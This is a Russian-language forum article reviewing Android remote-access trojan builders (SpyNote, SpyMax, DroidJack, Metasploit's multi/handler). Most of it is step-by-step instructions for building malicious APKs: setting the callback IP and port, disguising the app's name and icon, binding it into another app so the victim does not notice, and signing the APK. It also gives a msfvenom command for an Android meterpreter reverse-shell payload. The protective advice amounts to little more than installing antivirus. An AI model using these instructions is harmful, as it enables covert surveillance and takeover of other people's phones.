Проснулся с ужасной болью в голове и понял, что давно ничего не писал. Идея мелькала перед глазами давно, а ещё и достаточное количество материала сподвигло на этот шаг, написания ещё одного миниатюрного исследование. На этот раз испытаниям и издевательствам я подверг несколько программ для создания RAT для мобильных устройств - Android. Получилась объемная и интересная статья, как мне кажется.. Запасайтесь попкорном и выпивкой, а мы начинаем.

Введение

Для того, чтобы говорить о чём-то и комфортабельно обсуждать это что-то, сперва нужно прояснить себе мозг о этом объекте дискуссии. Речь, для начала, пойдёт о RAT.

Google гласит такое: ”RAT — аббревиатура англ. Remote Access Trojan, в переводе — «средство удалённого администрирования» или «средство удалённого управления» или «Троян удаленного доступа» Термин получил распространение среди системных администраторов и хакеров”.

Давайте разберёмся, что такое RAT

RAT - аббревиатура, что дословно рассшифровывается, как Remote Administration Tool. В дословном переводе означает - Утилита для удалённого администрирования. В идеальных условиях представляет из себя программное обеспечение, что зачастую представлено в схеме “Клиент- Сервер”. И речь идёт не о Dark Comet или тому подобных вирусных RAT’ах, а о подобии Team Viewer.

Но коль есть возможность управлять удалённо устройством, хацкеры спать не могли и после этого появились всем знакомые и простые до боли NJRAT, Comet и тому подобные.

На RAT для windows есть куча анализов и обзоров, поскольку такого много. Я решил написать то, что до меня никто не писал. Например анализ самых популярных программ для удалённого доступа для Android. Сказанное и показанное ниже, не призыв к действию, ловите дисклеймер:
Итак, рассмотрим самые часто используемые программы для создания вирусного ПО на ваши мобилки, а именно:

1. SpyNote
   
2. SpyMax
   
3. DroidJack
   
4. AhMoth
   
5. MultiHandler

И будут они разобраны и проанализированы по следующим критериям:

• Краткая история о программном обеспечении:
  
• Мануал по использованию:
  
• Особенности и недостатки и отчёт VT
  
• Способы защиты и выводы:

Первым в списке оказался SpyNote

1. Никакой истории написания и авторов найти не удалось, только короткие инструкции по использованию подобных вещей, которые трудно назвать благоразумными. В англоязычном гугле и прочих поисковиках - ничего не нашёл. Автор или специально запутал и затёр свои следы или их убрали другие пользователи.
   
2. Переходим к краткому руководству по использованию этого чуда. Тесты проводились на моих устройствах и никто, кроме моего мозга и рассудка не пострадал. Итак, всё классично и равносильно действиям с NJRAT, принцип их работы по сути один - установка сессии через заражённый файл к клиенту у вас.

Открываем нашу программу и переходим во вкладку “Bulid Client”, в которой устанавливаем иконку, названия и версию. После чего переходим в раздел “Dynamic Adress”, что отвечает за адрес нашего устройства, с которого создан этот чудесный бэкдор. Исходя из того, что работать будем в локальной сети, нет смысла регистрировать динамический айпи на специальных ресурсах, для превращения его в статический. Всё стандартно, вписываем айпи и порт, кликаем после этого на кнопочку “add”. На этом настройки в этой вкладке окончены. Переходим в следующую, где можно выставить особенности нашего вируса, с вашего позволения буду его так называть. Для некоторых требуются права супер юзера на устройстве жертвы, после кликаем на "Build" и ждём несколько минут. После чего видим APK в корневой папке.



Среди основного функционала хотелось бы отметить такие особенности, как:

• Возможность записи с микрофона.
  
• Возможность открыть shell linux’a
  
• Менеджер файлов и контактов.
  
• Ну и так далее.

3. Среди недостатков хотелось бы отметить маленький и ужатый функционал по отношению к другим приложениям. Ну и конечно-же высокий коэффициент обнаружения вирусных сигнатур антивирусами. Исходя из суждения о том, что на Android вирусов нет и антивирус не нужен, большинство устройств уязвимы. На новых устройствах, где есть ограничитель фонового трафика, сессия не отмечалась стабильностью и спустя несколько минут сходила на нет.

4. Cо способами защиты всё ясно, это примитивное троянское программное обеспечение, что показало процент обнаружения в соотношении 24\60, исходя с чего обычным антивирусом возможно защититься от подобной дряни.

SpyMAX

1. Закрадывается мысль о том, что авторы предыдущего программного обеспечения и этого одни и те же. SpyMAX можно назвать расширенной версией, о чём намекает само название. Есть некоторые отличия в работе, например, требования установки Java. В интернете отсутствует подробная информация о SpyMAX.
   
2. Здесь всё просто и понятно, справился даже ребёнок. Не исключаю, что читают это люди не образованные в этой сфере, поэтому распишу всё подробно. Для начала открываем нашу программку, кликаем на "Bluild", затем прописываем наш IP. После чего потребуется установленный пакет Java. В следующем разделе указываем путь к директории Bin в папке Java. Дальше всё по классике, выставляем название, иконку и тип приложения. Спустя несколько секунд жмем на OK, после чего откроется подобие командной строки, в которой будет отражен процесс создания APK приложения.
   
   
   
3. Имеет внушительный функционал, по сравнению со SpyNote. Для некоторых действий требуются права СуперЮзера и полный пакет Java. Сессия не выделилась стабильностью, так-как на новых версиях Андроид есть ограничитель фонового трафика. Процент выявления составил 30/60, что больше чем у предыдущего билдера. В некоторых случаях нужна подпись АПК файла, о которой я уже говорил.
   
4. Основным способом защиты является хороший антивирус с актуальными базами.
   
   

DroidJack

1. Опять же… Не удалось найти автора, лично мне известно только то, что это ПО одно из самых дорогих на чёрном рынке. В контактах значится Sankevee.
   
2. По традиции открываем наше чудо и выставляем порт для работы. Перейдя в вкладку Generate, замечаем оповещение о том, что IP адрес здесь не подойдёт и нужно использовать только Dynamic DNS, что собственно я и сделаю. После выставляем имя и прочую информацию о файле, жмём на галочку напротив надписи Hide и есть возможность слить наш вирус в единое с каким-то приложениям. При включенном хайд режиме жертва не будет подозревать об установке на её мобильное устройство вредоносного ПО.
   
3. Среди недостатков отмечу наличие сигнатур этого приложения в базах антивируса, в остальном он неплох. Процент обнаружения составил 23/60. Приложения платное и стоит около 200$ на чёрном рынке. Так-же есть куча расширенных опций в окошке Advanced.
   
4. Собственная внимательность и дотошность помогут вам в обнаружении этого всего. Используйте антивирус как вспомогательное средство.
   
   

Ahmyht

Когда я вплотную подошёл к тестированию Ahmyht, у меня окончательно вылетел интернет на целые сутки, в результате чего я решил отложить анализ этого приложения “на потом”.

MultiHandler

1. Это тот эксплоит, о котором можно говорить вечно. Его возможности ограничены только нашей фантазией и поэтому я не мог написать не задев его великой личности. В прошлой статье я уже затрагивал создание пэйлоада под андроид, делается это всё предельно просто и без всяких подводных камней, но есть нюансы.
   
2. Итак, для начала нам понадобится сгенерировать наш пэйлоад. Делается это командой:
   
   Код:
   
   
   
   Код:

   :msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.43.211 lport=8888 > /root/file.apk

   Затем осталось только и настроить слушатель под указанный айпи и пэйлоад.
   
   

Код:


После устанавливаем APK-шку на андроид, но видим следующее: "Ошибка установки". Погуглив, я нашёл решения этого метода. Установка не происходит потому, что АПК приложения не имеет подписи, но и это дело нам под силу! Естественно, возможно подписать своё приложения с помощью популярных сред разработки приложений, но мне этот вариант был не по душе и мне удалось нарыть приложения Zipsinger, которое в пару кликов его подпишет. После установки к нам летит сессия метерпретер.



Глобальные выводы

Нет смысла затягивать и подробно разъяснять и без того ясные вещи. Способы не идеальны и защитой могут служить светлая голова и осведомлённость. Установите антивирус. Вирусы на андроид есть, не забывайте о этом. Приложения в обзоре представлены в ознакомительных целях. Давайте будем умнее мошенников и школохацкеров. Удачи!.